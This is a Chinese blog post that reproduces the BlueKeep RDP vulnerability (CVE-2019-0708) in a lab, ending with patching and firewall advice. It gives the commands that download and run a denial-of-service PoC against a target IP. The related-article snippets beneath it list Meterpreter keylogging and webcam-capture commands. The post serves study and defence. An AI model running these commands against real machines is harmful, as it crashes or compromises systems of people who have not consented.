CVE-2019-0708 Windows RDP远程代码执行 漏洞复现

最新推荐文章于 2025-06-28 00:05:49 发布
最新推荐文章于 2025-06-28 00:05:49 发布
阅读量798 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CVE 系统漏洞复现 文章标签: windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WFC1006848997/article/details/112548398
本文围绕Windows RDP远程代码执行CVE-2019-0708漏洞展开,介绍该漏洞影响旧版Windows系统,可通过网络蠕虫利用。给出影响版本,搭建攻击机与靶机的漏洞环境,详细说明漏洞复现步骤,最后提供下载补丁、关闭端口、开启防火墙等修复方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Windows RDP远程代码执行 CVE-2019-0708 漏洞复现

漏洞简介

Windows操作系统远程桌面服务远程代码执行漏洞(CVE-2019-0708) , 2019年5月14日微软官方发布安全补丁,修复了windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。

影响版本

Windows 7

Windows server 2008 R2

Windows server 2008

Windows 2003

Windows xp

Windows 8和windows10以及之后的版本不受此漏洞影响

漏洞环境

攻击机:Windows 10

靶机:Windows 7

两机处于同一网络

攻击机安装python 3

靶机开启远程连接服务,即开启3389端口,关闭防火墙或者在防火墙策略中放行3389端口

漏洞复现

靶机查看是否开启3389端口

netstat -an

在这里插入图片描述

攻击机检测靶机是否存在该漏洞

检测工具下载: https://free.360totalsecurity.com/CVE-2019-0708/detector_release.zip

使用方法:

0708Detector_v2_x64.exe -t 192.168.30.153 -p 3389

在这里插入图片描述

出现如上提示,则说明应该存在该漏洞

进行攻击

攻击POC下载: https://github.com/n1xbyte/CVE-2019-0708

使用 python 安装 impacket模块

py -3 -m pip install  impacket

然后使用攻击的python脚本

py -3 crashpoc.py 192.168.30.153 64

在这里插入图片描述

靶机蓝屏,则攻击成功

在这里插入图片描述

漏洞修复

下载补丁:https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2019-0708

关闭3389远程桌面端口

开启防火墙

更新系统

[漏洞挖掘与防护] 01.漏洞利用之CVE-2019-0708复现及防御详解(含学习路线)
杨秀璋的专栏
07-10 1530
这是作者新开的一个专栏——“漏洞挖掘与防护”。第一篇文章将详细介绍Windows远程桌面服务漏洞CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击,堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好的地方,可以联系我修改。基础性文章,希望对您有所帮助!
[系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及防御详解
杨秀璋的专栏
12-27 1万+
娜璋AI安全之家于2020年8月18日开通,将专注于Python和安全技术,主要分享Web渗透、系统安全CVE复现、威胁情报分析、人工智能、大数据分析、恶意代码检测等文章。真心想把自己近十年的所学所做所感分享出来,与大家一起进步。 系统安全系列作者将深入研究恶意样本分析、逆向分析、漏洞利用、攻防实战等,通过在线笔记和实践操作的形式分享与博友们学习。前文通过编写程序实现获取Windows系统目录文件,并对其进行加密和解密的过程。这篇文章将详细介绍Windows远程桌面服务漏洞CVE-2019-0708),
CVE-2019-0708-ExpLoit.zip
05-15
CVE-2019-0708-exploit,针对远程桌面服务(以前称为终端服务)的关键远程执行代码漏洞CVE-2019-0708,以下是Windows版利用工具,以及python版利用工具
CVE-2019-0708 微软补丁更新
热门推荐
似水无痕
05-17 2万+
微软公司于美国当地时间2019年5月14日发布重要安全公告,其操作系统远程桌面(Remote Desktop Services),俗称的3389服务存在严重安全漏洞(编号CVE-2019-0708):攻击者在没有任何授权的情况下(不需要用户名和密码),可以远程直接攻击操作系统开放的3389服务,在受害主机上执行恶意攻击行为,包括安装后门,查看、篡改隐私数据,创建拥有完全用户权限的新账户,影响范围从...
漏洞复现CVE-2019-0708
最新发布
2501_90131820的博客
06-28 571
摘要:本文记录了CVE-2019-0708(BlueKeep)漏洞复现过程。该漏洞存在于Windows远程桌面服务中,可导致远程代码执行。实验使用Kali(192.168.8.136)攻击未打补丁的Win7靶机(192.168.8.147)。通过nmap确认3389端口开放后,使用Metasploit的扫描模块检测漏洞存在,再切换攻击模块尝试利用。虽然最终因版本差异未成功建立会话,但完整演示了漏洞利用流程。作者在深夜完成实验后,祝愿读者暑假愉快。
CVE-2019-0708远程桌面代码执行漏洞复现
weixin_30709635的博客
09-09 262
漏洞环境 使用VMware 安装Windows7 SP1模拟受害机 利用 攻击工具准备 1.使用如下命令一键更新安装的metasploit框架 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-fram...
CVE-2019-0708
qq_46487664的博客
03-22 2987
windows经典历史漏洞CVE-2019-0708
Kali--MSF(CVE-2019-0708漏洞复现
weixin_53946822的博客
08-25 717
出现你就已经成功的入侵的对方的电脑监控靶机电脑屏幕keyscan_start 开始捕获击键(开始键盘记录)keyscan_dump 转储按键缓冲(下载键盘记录)keyscan_stop 停止捕获击键(停止键盘记录)record_mic X秒从默认的麦克风record_mic音频记录(音频录制)webcam_chat 开始视频聊天(视频,对方会有弹窗)webcam_list 单摄像头(查看摄像头列表)webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
CVE-2019-0708 windwos 远程桌面协议(RDP) 漏洞利用及加固
alert['Hello World']
11-11 1151
漏洞描述: 当未经身份验证的攻击者使用RDP连接到目标系统并发送经特殊设计的请求(也称为“远程桌面服务远程执行代码漏洞”)时,远程桌面服务中存在一个远程执行代码漏洞(以前称为终端服务)。 影响版本: - Windows XP SP3 x86 - Windows XP专业x64版SP2 - Windows XP Embedded SP3 x86 - Windows Server 2003 SP2 x86 - Windows Server 2003 x64版本SP2 环境搭建 漏洞检测 漏洞利用
cve-2019-0708
weixin_43741181的博客
09-23 267
1.复现环境:kali :192.168.174.133 win7:192.168.174.132 下载文件。 wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core...
cve-2019-0708远程桌面代码执行漏洞复现
明哥哥知识分享
11-05 1056
1.影响版本 Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows 2003 Windows XP 2.漏洞描述 Microsoft Windows中存在远程桌面执行代码漏洞,该漏洞源于Microsoft Remote Desktop Services中存在输入验证错误漏洞,网络系统或产品未对输入的数据进行正确的验证。当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在
[漏洞复现]CVE-2019-0708
网络安全知识分享
03-05 4951
CVE-2019-0708复现一、远程桌面连接二、kali系统还原漏洞 一、远程桌面连接 首先,我们要设置远程连接 在控制面板中,搜索“远程设置”->“远程”,勾选“允许远程协助连接这台计算机”和“仅允许运行使用网络级别身份验证的远程桌面的计算机联机”,然后点击“应用”。 下一步,查看Win7的IP地址,CMD中输入指令ipconfig 接着打开远程控制的电脑Win10系统,在运行中输入“mstsc”。 输入刚才得知的Win7 IP地址 是 下一步的弹窗会要求输入账户和密码,点击确定(或者保存密码
CVE-2019-0708远程桌面服务RCE)漏洞复现
sucker的博客
10-29 1970
存在漏洞远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行。该漏洞的触发无需任何用户交互操作,这就意味着,存在漏洞的计算机只要联网,无需任何操作,就有可能遭遇黑客远程攻击,运行恶意代码等,极具破坏性!1,win7设置为NAT模式,并记录其MAC地址。
CVE-2019-0708远程桌面服务RCE)漏洞复现(超详细Getshell)
unlash的博客
10-28 1万+
CVE-2019-0708远程桌面服务RCE)漏洞复现(超详细Getshell) 漏洞介绍 漏洞修复 复现条件
Windows 远程桌面授权服务远程代码执行漏洞CVE-2024-38077)
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-10 9042
开启该服务(Windows 远程桌面授权服务)并且操作系统版本在受影响范围的 Windows Server 受影响,没有开启该服务但是操作系统版本在受影响范围的Windows Server 不受影响,Windows 10、Windows 11 等非 Server 版本的操作系统,不论是否开启Windows 远程桌面(RDS),均不受影响。这一漏洞存在于Windows远程桌面许可管理服务(RDL)中,该服务被广泛部署于开启Windows远程桌面(3389端口)的服务器,用于管理远程桌面连接许可。
漏洞复现CVE-2019-0708(BlueKeep)
weixin_45632448的博客
06-14 4132
2019年5月14日微软官方发布安全补丁,修复了 Windows 远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的 Windows 系统。此漏洞是预身份验证,无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用,与2017年 WannaCry 勒索病毒的传播方式类似。存在漏洞远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数
深入分析CVE-2019-0708远程代码执行漏洞利用工具
CVE-2019-0708 是一个引起广泛关注的远程桌面服务漏洞,存在于远程桌面协议 (RDP) 中,该服务是 Windows 操作系统的一个组件,被用于提供远程访问和桌面共享。 CVE-2019-0708 被别名为“蓝屏”(BlueKeep),因其类似...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值